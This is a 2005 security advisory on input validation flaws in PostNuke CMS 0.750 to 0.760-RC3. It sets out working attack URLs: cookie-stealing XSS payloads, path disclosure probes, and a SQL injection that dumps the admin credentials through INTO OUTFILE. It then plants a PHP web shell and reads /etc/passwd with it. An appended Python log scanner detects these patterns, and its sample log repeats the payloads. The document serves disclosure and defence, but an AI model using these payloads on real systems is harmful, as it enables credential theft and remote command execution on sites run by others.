PostNuke Multiple Remote Input Validation Vulnerabilities
Published: 2005-05-26
Updated: 2005-05-26
Affected systems:
PostNuke PostNuke Phoenix 0.760-RC3
PostNuke PostNuke Phoenix 0.760-RC2
PostNuke PostNuke Phoenix 0.750
PostNuke PostNuke Phoenix 0.750 b
Unaffected systems:
Description:
BUGTRAQ ID: 13706
CVE(CAN) ID: CVE-2005-1696,CVE-2005-1698,CVE-2005-1695,CVE-2005-1697,CVE-2005-1694
PostNuke is an open-source, openly developed content management system (CMS).
PostNuke contains multiple input validation vulnerabilities because the application fails to properly sanitize user-supplied input.
The SQL injection vulnerabilities may allow a remote attacker to supply malicious input to database queries, altering the query logic or enabling other attacks. A successful attack may lead to compromise of the application, disclosure or modification of data, or exploitation of vulnerabilities in the underlying database implementation.
PostNuke is also affected by multiple cross-site scripting vulnerabilities. An attacker may exploit them to execute arbitrary script code in an unsuspecting user's browser, leading to theft of cookie-based authentication credentials or other attacks.
<*Source: Maksymilian Arciemowicz (max@jestsuper.pl)
Links: http://marc.theaimsgroup.com/?l=bugtraq&m=111670506926649&w=2
http://marc.theaimsgroup.com/?l=bugtraq&m=111670482500552&w=2
http://marc.theaimsgroup.com/?l=bugtraq&m=111670823128472&w=2
*>
Test method:
Warning
The following programs (methods) may be offensive in nature and are provided solely for security research and teaching. Use at your own risk!
http://[HOST]/[DIR]/modules/Xanthia/pnhtml/demo.php?skin=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[HOST]/[DIR]/modules/Xanthia/pnhtml/demo.php?paletteid=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
If PHP errors are displayed and register_globals = On:
http://[HOST]/[DIR]/modules/Multisites/installation/config.php?serverName=<H1>SUICIDE</H1>
Or, for 0.750:
http://[HOST]/[DIR]/modules/NS-Multisites/installation/config.php?serverName=<H1>SUICIDE</H1>
--- Full path disclosure ---
http://[HOST]/[DIR]/modules/Xanthia/pndocs/themes/theme.php
Error message:
---------------
Warning: main(/home/kellan/projs/magpierss/scripts/Smarty/Smarty.class.php) [function.main]: failed to open stream: No such file or directory in /www/PostNuke-0.760-RC3/html/modules/RSS/pnincludes/scripts/simple_smarty.php on line 8
Fatal error: main() [function.require]: Failed opening required '/home/kellan/projs/magpierss/scripts/Smarty/Smarty.class.php' (include_path='.:') in /www/PostNuke-0.760-RC3/html/modules/RSS/pnincludes/scripts/simple_smarty.php on line 8
---------------
http://[HOST]/[DIR]/modules/Xanthia/pnclasses/Xanthia.php
Error message:
---------------
Fatal error: Call to undefined function pnModGetVar() in /www/PostNuke-0.760-RC3/html/modules/Xanthia/pnclasses/Xanthia.php on line 48
---------------
http://[HOST]/[DIR]/modules/Blocks/pnblocks/user.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/thelang.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/text.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/html.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/menu.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/finclude.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/button.php
Error message:
---------------
Fatal error: Call to undefined function pnSecAddSchema() in /www/PostNuke-0.760-RC3/html/modules/Blocks/pnblocks/button.php on line 48
---------------
http://[HOST]/[DIR]/modules/NS-Multisites/installation/config.php
Or, for 0.760-RC3:
http://[HOST]/[DIR]/modules/Multisites/installation/config.php
Error message:
---------------
Warning: main(parameters/whoisit.inc.php) [function.main]: failed to open stream: No such file or directory in /www/PostNuke-0.750/html/modules/NS-Multisites/installation/config.php on line 2
Warning: main() [function.include]: Failed opening 'parameters/whoisit.inc.php' for inclusion (include_path='.:') in /www/PostNuke-0.750/html/modules/NS-Multisites/installation/config.php on line 2
---------------
http://[HOST]/[DIR]/xmlrpc.php
Error message:
---------------
Fatal error: Cannot redeclare xmlrpc_decode() in /www/PostNuke-0.760-RC3/html/modules/xmlrpc/lib/xmlrpc.inc on line 1068
---------------
--- Cross-site scripting in the RSS module ---
http://[HOST]/[DIR]/modules/RSS/pnincludes/scripts/magpie_slashbox.php?rss_url=[XSS]
http://[HOST]/[DIR]/modules/RSS/pnincludes/scripts/magpie_simple.php?url=">[XSS]
http://[HOST]/[DIR]/modules/RSS/pnincludes/scripts/magpie_debug.php?url=%22%3E[XSS]
--- Full path disclosure in the RSS module ---
http://[HOST]/[DIR]/modules/RSS/pnincludes/scripts/simple_smarty.php
---------------
Warning: main(/home/kellan/projs/magpierss/scripts/Smarty/Smarty.class.php) [function.main]: failed to open stream: No such file or directory in /www/PostNuke-0.760-RC3/html/modules/RSS/pnincludes/scripts/simple_smarty.php on line 8
Fatal error: main() [function.require]: Failed opening required '/home/kellan/projs/magpierss/scripts/Smarty/Smarty.class.php' (include_path='.:') in /www/PostNuke-0.760-RC3/html/modules/RSS/pnincludes/scripts/simple_smarty.php on line 8
---------------
--- SQL injection ---
[Obtaining the administrator password]
First determine the PostNuke installation directory:
http://[HOST]/[DIR]/modules.php?op=modload&name='cXIb8O3&file=index
Error message:
---------------
Fatal error: Call to a member function GetRowAssoc() on a non-object in /www/PostNuke-0.750/source/html/modules/Xanthia/pnclasses/Xanthia.php on line 977
---------------
Here the path prefix is /www/PostNuke-0.750/source/html/. The attack can now be carried out, but the database table prefix must also be known.
http://[HOST]/[DIR]/index.php?module=Xanthia'%20UNION%20SELECT%20pn_uname,pn_pass%20FROM%20[db_prefix]users%20WHERE%20pn_uid=2%20INTO%20OUTFILE%20'[DIR_PREFIX]/pnTemp/Xanthia_cache/cXIb8O3'/*&type=admin&func=view
The error message is:
---------------
Failed to load module Xanthia' UNION SELECT pn_uname,pn_pass FROM pn__users WHERE pn_uid=2 INTO OUTFILE '/www/PostNuke-0.750/source/html/pnTemp/Xanthia_cache/cXIb8O3'/* (at function: "view")
---------------
But now open:
http://[HOST]/[DIR]/pnTemp/Xanthia_cache/cXIb8O3
and the password of the user with id=2 has been obtained.
[Blind upload]
http://[HOST]/[DIR]/user.php?op=edituser
Enter PHP code in the "extra information" field, for example:
---
<?php system($_GET[cXIb8O3]); ?>
---
This code can now be used to create a PHP script, e.g.:
http://[HOST]/[DIR]/index.php?module=Xanthia'%20UNION%20SELECT%20pn_bio,pn_uname%20FROM%20[db_prefix]users%20WHERE%20pn_uid=[YOUR_ID]%20INTO%20OUTFILE%20'[DIR_PREFIX]/pnTemp/Xanthia_cache/cXIb8O3.php'/*&type=admin&func=view
Then:
http://[HOST]/[DIR]/pnTemp/Xanthia_cache/cXIb8O3.php?cXIb8O3=cat /etc/passwd
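As an added example (not part of the original advisory or of PostNuke), the following Python script flags access-log requests that match the patterns documented above: script tags in Xanthia and Multisites parameters, direct hits on the include files that leak full paths, the index.php?module= injection using INTO OUTFILE, and the follow-up fetch from pnTemp/Xanthia_cache. The log lines, the /pn install path, the pn_ table prefix, the /var/www/pn OUTFILE path and the client IPs are all constructed for the example.

```python
import re
from urllib.parse import unquote_plus
# Include files that emit the full-path-disclosure errors quoted in the advisory
# when requested directly; a browser following normal site links never hits them.
DIRECT_INCLUDE_PATHS = (
    "/modules/Xanthia/pndocs/themes/theme.php",
    "/modules/Xanthia/pnclasses/Xanthia.php",
    "/modules/RSS/pnincludes/scripts/simple_smarty.php",
    "/modules/NS-Multisites/installation/config.php",
    "/modules/Multisites/installation/config.php",
)
SQLI_RE = re.compile(r"union\s+select|into\s+outfile|/\*", re.I)
XSS_RE = re.compile(r'<\s*/?\s*(script|h1)\b|"\s*>', re.I)
# Combined log format (Apache/nginx); only the fields used below are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+)[^"]*" (?P<status>\d{3})')

def classify(url: str) -> list:
    """Return the advisory patterns matched by one request path+query."""
    decoded = unquote_plus(url)            # %3Cscript%3E -> <script>, %20 -> space
    path, _, query = decoded.partition("?")
    findings = []
    if path.endswith(DIRECT_INCLUDE_PATHS) or "/modules/Blocks/pnblocks/" in path:
        findings.append("path-disclosure-probe")
    if path.endswith("/index.php") and "module=" in query and SQLI_RE.search(query):
        findings.append("sqli-module-param")      # index.php?module=Xanthia' UNION ...
    if path.endswith("/modules.php") and re.search(r"name=[^&]*'", query):
        findings.append("sqli-probe-modules-name")  # the path-discovery step before the injection
    if "/pnTemp/Xanthia_cache/" in path:
        findings.append("cache-dir-fetch")        # retrieval of a file written with INTO OUTFILE
    if XSS_RE.search(query):
        findings.append("xss-in-query")
    return findings

def scan_log(lines) -> list:
    """Return (ip, url, findings) for every access-log line matching at least one pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (findings := classify(m.group("url"))):
            hits.append((m.group("ip"), m.group("url"), findings))
    return hits

# Constructed sample log: one client walking the advisory's steps, then a normal request.
SAMPLE_LOG = """\
203.0.113.7 - - [26/May/2005:10:01:02 +0000] "GET /pn/modules/Xanthia/pnhtml/demo.php?skin=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [26/May/2005:10:01:09 +0000] "GET /pn/modules.php?op=modload&name='cXIb8O3&file=index HTTP/1.1" 200 301 "-" "Mozilla/5.0"
203.0.113.7 - - [26/May/2005:10:01:30 +0000] "GET /pn/index.php?module=Xanthia'%20UNION%20SELECT%20pn_uname,pn_pass%20FROM%20pn_users%20WHERE%20pn_uid=2%20INTO%20OUTFILE%20'/var/www/pn/pnTemp/Xanthia_cache/cXIb8O3'/*&type=admin&func=view HTTP/1.1" 200 440 "-" "Mozilla/5.0"
203.0.113.7 - - [26/May/2005:10:01:41 +0000] "GET /pn/pnTemp/Xanthia_cache/cXIb8O3 HTTP/1.1" 200 38 "-" "Mozilla/5.0"
198.51.100.2 - - [26/May/2005:10:02:00 +0000] "GET /pn/index.php?module=News&func=view&sid=12 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""
```

A single client producing the path-disclosure probe, the module= injection and a cache-directory fetch within a short window is the sequence worth alerting on; each pattern on its own is a weaker signal.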
Recommendation:
Vendor patch:
PostNuke
--------
The vendor has released an upgrade patch that fixes this security issue; please download it from the vendor's homepage:
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-411.html